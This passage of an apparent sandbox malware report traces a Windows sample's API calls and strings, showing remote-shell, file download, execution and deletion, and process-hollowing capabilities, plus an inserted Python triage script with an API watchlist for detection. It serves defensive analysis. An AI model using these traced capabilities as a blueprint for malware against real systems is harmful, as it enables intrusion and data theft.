                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                                                    • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$HandleLibraryLoadModule
                                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                    • API String ID: 384173800-625181639
                                                    • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                    • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                                                    • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                    • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE
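The block above is the sample's runtime import resolver: each LoadLibraryA/GetModuleHandleA call is immediately followed by a GetProcAddress, and because Joe Sandbox prints the caller's stack arguments, the library name and the function-name string show up as the first two arguments of the load call. The following is an added triage script, not part of the Joe Sandbox report or of the sample, that parses such "APIs" lines, pairs each load with the GetProcAddress that follows it, and flags the resolved names against an analyst watchlist. The sample lines are copied from the block above; the watchlist and its reason tags are this example's own assumptions, not classifications made by the report.

```python
import re

# Constructed sample input: "APIs" lines copied from the resolver block above.
# A real run would feed the whole report text instead.
SAMPLE = """\
• LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
• GetProcAddress.KERNEL32(00000000), ref: 0041BD11
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
• GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
• GetProcAddress.KERNEL32(00000000), ref: 0041BD68
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
• GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
• LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
• GetProcAddress.KERNEL32(00000000), ref: 0041BE63
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
• GetProcAddress.KERNEL32(00000000), ref: 0041BE19
"""

# One report line: "• Api.MODULE(arg,arg,...), ref: ADDRESS"
LINE_RE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Analyst watchlist: an assumption of this example, not a list from the report.
WATCHLIST = {
    "ntunmapviewofsection": "unmap image in target process (hollowing primitive)",
    "ntsuspendprocess": "suspend another process",
    "ntresumeprocess": "resume another process",
    "isuseranadmin": "privilege check",
    "setprocessdeppolicy": "change DEP policy",
    "getextendedtcptable": "enumerate TCP connections",
    "getextendedudptable": "enumerate UDP endpoints",
    "getprocessimagefilenamew": "enumerate process image paths",
}


def parse_api_lines(text):
    """Yield (api, module, args, ref) for every line matching the report format."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        yield m.group("api"), m.group("mod"), args, m.group("ref")


def resolved_imports(text):
    """Pair each LoadLibraryA/GetModuleHandleA with the GetProcAddress after it.

    arg[0] is the library name and arg[1] the function-name string that the
    following GetProcAddress resolves. An 8-hex-digit "name" is an ordinal
    import (e.g. Shlwapi ordinal 0xC above).
    """
    imports = []
    pending = None
    for api, _mod, args, ref in parse_api_lines(text):
        if api in ("LoadLibraryA", "GetModuleHandleA") and len(args) >= 2:
            pending = (args[0], args[1], ref)
        elif api == "GetProcAddress" and pending is not None:
            lib, func, load_ref = pending
            kind = "ordinal" if re.fullmatch(r"[0-9A-Fa-f]{8}", func) else "name"
            imports.append({"lib": lib.lower(), "func": func, "kind": kind, "ref": load_ref})
            pending = None
    return imports


def triage(text):
    """Return (lib, func, reason, ref) for resolved imports on the watchlist."""
    hits = []
    for imp in resolved_imports(text):
        reason = WATCHLIST.get(imp["func"].lower())
        if reason:
            hits.append((imp["lib"], imp["func"], reason, imp["ref"]))
    return hits


if __name__ == "__main__":
    for lib, func, reason, ref in triage(SAMPLE):
        print(f"{ref}  {lib}!{func:<28} {reason}")
```

The pairing relies on the report's convention of printing stack arguments; if a load call is shown with fewer than two arguments the pair is skipped rather than guessed. Ordinal imports are kept in the resolved list but, since the watchlist is keyed by name, they never produce a hit on their own.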

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,0044253A,?), ref: 00442585
                                                    • TerminateProcess.KERNEL32(00000000,?,0044253A,?), ref: 0044258C
                                                    • ExitProcess.KERNEL32 ref: 0044259E
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                    • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                                                    • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                    • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88

                                                    Control-flow Graph

                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00475B90,?,?,00000000,00475B90,004017F3), ref: 004047FD
                                                    • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404808
                                                    • CloseHandle.KERNELBASE(?,?,?,00000000,00475B90,004017F3), ref: 00404811
                                                    • closesocket.WS2_32(?), ref: 0040481F
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 00404856
                                                    • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404867
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 0040486E
                                                    • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404880
                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404885
                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 0040488A
                                                    • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404895
                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 0040489A
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                    • String ID:
                                                    • API String ID: 3658366068-0
                                                    • Opcode ID: b48fac80ca5b148fdad783a92e94d640e15fce6fe8a7544b86a0cf0c1a1052f0
                                                    • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                                                    • Opcode Fuzzy Hash: b48fac80ca5b148fdad783a92e94d640e15fce6fe8a7544b86a0cf0c1a1052f0
                                                    • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48

                                                    Control-flow Graph

                                                    APIs
                                                    • GetLastError.KERNEL32(?,00000000,00000000,0043A7D2,00000000,?,?,0043A856,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F58
                                                    • _free.LIBCMT ref: 00446F8D
                                                    • _free.LIBCMT ref: 00446FB4
                                                    • SetLastError.KERNEL32(00000000), ref: 00446FC1
                                                    • SetLastError.KERNEL32(00000000), ref: 00446FCA
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                    • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                                                    • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                    • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F

                                                    Control-flow Graph (basic blocks as id: address range, call made in the block; successors after ->; the executed/not-executed colouring of the rendered graph was not captured)
                                                    • 45: 447220-447234 -> 46, 47
                                                    • 46: 447236-44723f -> 48
                                                    • 47: 447241-44725c, LoadLibraryExW -> 49, 50
                                                    • 48: 447298-44729a (no successors)
                                                    • 49: 447285-44728b -> 51, 52
                                                    • 50: 44725e-447267, GetLastError -> 53, 54
                                                    • 51: 447294 -> 56
                                                    • 52: 44728d-44728e, FreeLibrary -> 51
                                                    • 53: 447276 -> 55
                                                    • 54: 447269-447274, LoadLibraryExW -> 55
                                                    • 55: 447278-44727a -> 49, 57
                                                    • 56: 447296-447297 -> 48
                                                    • 57: 44727c-447283 -> 56
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                                                    • GetLastError.KERNEL32(?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3177248105-0
                                                    • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                    • Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
                                                    • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                    • Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8

                                                    Control-flow Graph (basic blocks as id: address range, call made in the block; successors after ->; the executed/not-executed colouring of the rendered graph was not captured)
                                                    • 58: 447184-4471ae -> 59, 60
                                                    • 59: 4471b0-4471b2 -> 61, 62
                                                    • 60: 447219 -> 63
                                                    • 61: 4471b4-4471b6 -> 63
                                                    • 62: 4471b8-4471be -> 64, 65
                                                    • 63: 44721b-44721f (no successors)
                                                    • 64: 4471c0-4471c2, call 447220 -> 68
                                                    • 65: 4471da -> 67
                                                    • 67: 4471dc-4471de -> 69, 70
                                                    • 68: 4471c7-4471ca -> 71, 72
                                                    • 69: 4471e0-4471ee, GetProcAddress -> 73, 74
                                                    • 70: 447209-447217 -> 60
                                                    • 71: 4471cc-4471d2 -> 64, 76
                                                    • 72: 4471fb-447201 -> 67
                                                    • 73: 4471f0-4471f9, call 4333b7 -> 61
                                                    • 74: 447203 -> 70
                                                    • 76: 4471d4 -> 65
                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004471E4
                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004471F1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc__crt_fast_encode_pointer
                                                    • String ID: Zb1Y/
                                                    • API String ID: 2279764990-3232713500
                                                    • Opcode ID: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                    • Instruction ID: 3b3a260b8722ab3c424429fa82009fd7979b69f7a0747b894072712038533021
                                                    • Opcode Fuzzy Hash: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                    • Instruction Fuzzy Hash: C8110633A041619FAB229F28EC4095B7395FB803647168672FD19AB354D734EC4386E9

                                                    Control-flow Graph (single basic block; the executed/not-executed colouring of the rendered graph was not captured)
                                                    • 78: 40bed7-40bf03, call 401e8f, CreateMutexA, GetLastError
                                                    APIs
                                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                    • GetLastError.KERNEL32 ref: 0040BEF1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateErrorLastMutex
                                                    • String ID: (CG
                                                    • API String ID: 1925916568-4210230975
                                                    • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                    • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                    • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                    • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                                                    Control-flow Graph (basic blocks as id: address range, call made in the block; successors after ->; the executed/not-executed colouring of the rendered graph was not captured)
                                                    • 103: 448716-448721 -> 104, 105
                                                    • 104: 448723-44872d -> 105, 106
                                                    • 105: 44872f-448735 -> 107, 108
                                                    • 106: 448763-44876e, call 445364 -> 112
                                                    • 107: 448737-448738 -> 108
                                                    • 108: 44874e-44875f, RtlAllocateHeap -> 109, 110
                                                    • 109: 448761 -> 112
                                                    • 110: 44873a-448741, call 4447d5 -> 106, 116
                                                    • 112: 448770-448772 (no successors)
                                                    • 116: 448743-44874c, call 442210 -> 106, 108
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,0043A856,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448757
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                    • Instruction ID: 28044070be8b550b436e3a89d8ee4c5083ce1cba36f38117670c034d6afde2c5
                                                    • Opcode Fuzzy Hash: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                    • Instruction Fuzzy Hash: 0FF0E03154562467BB217A669D56B5F7744AF41770B34402FFC04A6190CF68D901C2DD

                                                    Control-flow Graph (basic blocks as id: address range, call made in the block; successors after ->; the executed/not-executed colouring of the rendered graph was not captured)
                                                    • 119: 446b0f-446b1b -> 120, 121
                                                    • 120: 446b4d-446b58, call 445364 -> 128
                                                    • 121: 446b1d-446b1f -> 123, 124
                                                    • 123: 446b21-446b22 -> 124
                                                    • 124: 446b38-446b49, RtlAllocateHeap -> 125, 126
                                                    • 125: 446b24-446b2b, call 4447d5 -> 120, 131
                                                    • 126: 446b4b -> 128
                                                    • 128: 446b5a-446b5c (no successors)
                                                    • 131: 446b2d-446b36, call 442210 -> 120, 124
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                    • Instruction ID: 9aef8a7b80d5ef8cde78cc1a95e43686bba12cbd10c6cd592e8946dff14ce016
                                                    • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                    • Instruction Fuzzy Hash: 54E0E5312012B5A7FB202A6A9C05F5B7688DB437A4F060033AC45D66D0CB58EC4181AF
                                                    APIs
                                                    • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                    • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                      • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B499
                                                      • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4CB
                                                      • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B51C
                                                      • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B571
                                                      • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B578
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                      • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                      • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                      • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                      • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                                                      • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                    • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                      • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                      • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                      • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                    • Sleep.KERNEL32(000007D0), ref: 00407976
                                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                      • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                    • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                    • API String ID: 2918587301-599666313
                                                    • Opcode ID: 6e5f636b2d678d8760414e699c4a29ba3f1ccd129c8a5d01eb096a421d459fa4
                                                    • Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
                                                    • Opcode Fuzzy Hash: 6e5f636b2d678d8760414e699c4a29ba3f1ccd129c8a5d01eb096a421d459fa4
                                                    • Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 0040508E
                                                      • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                      • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    • __Init_thread_footer.LIBCMT ref: 004050CB
                                                    • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                                                    • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                                                      • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                      • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                      • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                    • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                    • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                    • CloseHandle.KERNEL32 ref: 004053CD
                                                    • CloseHandle.KERNEL32 ref: 004053D5
                                                    • CloseHandle.KERNEL32 ref: 004053E7
                                                    • CloseHandle.KERNEL32 ref: 004053EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                    • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                                    • API String ID: 3815868655-1274243119
                                                    • Opcode ID: 5a9832b8623080509314391e65ed87d579c7873f1e98d06c772b4f9a63e6e4cb
                                                    • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                                                    • Opcode Fuzzy Hash: 5a9832b8623080509314391e65ed87d579c7873f1e98d06c772b4f9a63e6e4cb
                                                    • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                      • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                      • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                      • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                    • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                      • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                      • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                      • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                    • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
